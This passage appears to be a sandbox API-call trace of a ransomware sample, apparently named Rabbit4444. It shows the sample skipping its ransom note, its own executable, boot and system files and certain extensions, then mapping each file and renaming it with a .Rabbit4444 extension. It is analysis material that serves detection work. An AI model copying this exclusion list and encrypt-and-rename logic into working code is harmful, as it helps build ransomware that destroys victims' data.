(lpString1="BiosBlocks.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.722] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="Rabbit4444.exe") returned -1 [0046.723] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2=".") returned 1 [0046.723] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="..") returned 1 [0046.723] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="windows") returned -1 [0046.723] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="bootmgr") returned -1 [0046.723] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="pagefile.sys") returned -1 [0046.723] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="boot") returned -1 [0046.723] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="ids.txt") returned -1 [0046.723] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="NTUSER.DAT") returned -1 [0046.723] lstrcpyW (in: lpString1=0x11cea26, lpString2="BiosBlocks.xml" | out: lpString1="BiosBlocks.xml") returned="BiosBlocks.xml" [0046.723] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml", dwFileAttributes=0x0) returned 1 [0046.724] lstrlenW (lpString="BiosBlocks.xml") returned 14 [0046.724] lstrlenW (lpString="Rabbit4444") returned 10 [0046.724] lstrcmpiW (lpString1="Blocks.xml", lpString2="Rabbit4444") returned -1 [0046.724] lstrlenW (lpString=".dll") returned 4 [0046.724] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0046.724] lstrlenW (lpString=".lnk") returned 4 [0046.724] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0046.724] lstrlenW (lpString=".ini") returned 4 [0046.724] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0046.724] lstrlenW (lpString=".sys") returned 4 [0046.724] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0046.724] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0046.724] QueryPerformanceFrequency (in: lpFrequency=0x11cbe60 | out: lpFrequency=0x11cbe60*=100000000) returned 1 [0046.724] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe68 | out: lpPerformanceCount=0x11cbe68*=13803502753) returned 1 [0046.724] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x11cbec0 | out: lpFileSize=0x11cbec0*=91648) returned 1 [0046.724] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0046.724] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0046.724] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16900, lpName=0x0) returned 0x280 [0046.725] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16900) returned 0x70000 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x117480 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0046.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117480 | out: hHeap=0xe0000) returned 1 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x119df0 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x1054d0 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x11a000 [0046.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x11e450 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11a210 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20c) returned 0x11e660 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b48 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0046.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a210 | out: hHeap=0xe0000) returned 1 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x11e878 [0046.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b18 [0046.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0046.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0046.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x1098e8 [0046.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b18 | out: hHeap=0xe0000) returned 1 [0046.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x11ea88 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0046.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0046.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105490 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105490 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0046.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0046.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0046.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0046.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0046.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0046.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0046.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0046.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e450 | out: hHeap=0xe0000) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e878 | out: hHeap=0xe0000) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e660 | out: hHeap=0xe0000) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ea88 | out: hHeap=0xe0000) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b48 | out: hHeap=0xe0000) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0046.740] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe70 | out: lpPerformanceCount=0x11cbe70*=13805087473) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0046.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0046.740] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.741] CloseHandle (hObject=0x280) returned 1 [0046.741] CloseHandle (hObject=0x2a0) returned 1 [0046.744] wsprintfW (in: param_1=0x11cc170, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml.Rabbit4444") returned 60 [0046.744] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml.rabbit4444"), dwFlags=0x1) returned 1 [0046.745] InterlockedExchangeAdd (in: Addend=0xff3e8, Value=91648 | out: Addend=0xff3e8) returned 0 [0046.745] InterlockedExchangeAdd (in: Addend=0xff3f4, Value=15 | out: Addend=0xff3f4) returned 0 [0046.745] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ac6e0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ac6e0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x4071, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwcompat.txt", cAlternateFileName="")) returned 1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2="Rabbit4444.exe") returned -1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2=".") returned 1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2="..") returned 1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2="windows") returned -1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2="bootmgr") returned 1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2="pagefile.sys") returned -1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2="boot") returned 1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2="ids.txt") returned -1 [0046.745] lstrcmpiW (lpString1="hwcompat.txt", lpString2="NTUSER.DAT") returned -1 [0046.745] lstrcpyW (in: lpString1=0x11cea26, lpString2="hwcompat.txt" | out: lpString1="hwcompat.txt") returned="hwcompat.txt" [0046.745] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt", dwFileAttributes=0x0) returned 1 [0046.745] lstrlenW (lpString="hwcompat.txt") returned 12 [0046.746] lstrlenW (lpString="Rabbit4444") returned 10 [0046.746] lstrcmpiW (lpString1="compat.txt", lpString2="Rabbit4444") returned -1 [0046.746] lstrlenW (lpString=".dll") returned 4 [0046.746] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0046.746] lstrlenW (lpString=".lnk") returned 4 [0046.746] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0046.746] lstrlenW (lpString=".ini") returned 4 [0046.746] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0046.746] lstrlenW (lpString=".sys") returned 4 [0046.746] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0046.746] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt"), dwDesiredAccess=0xe0003, 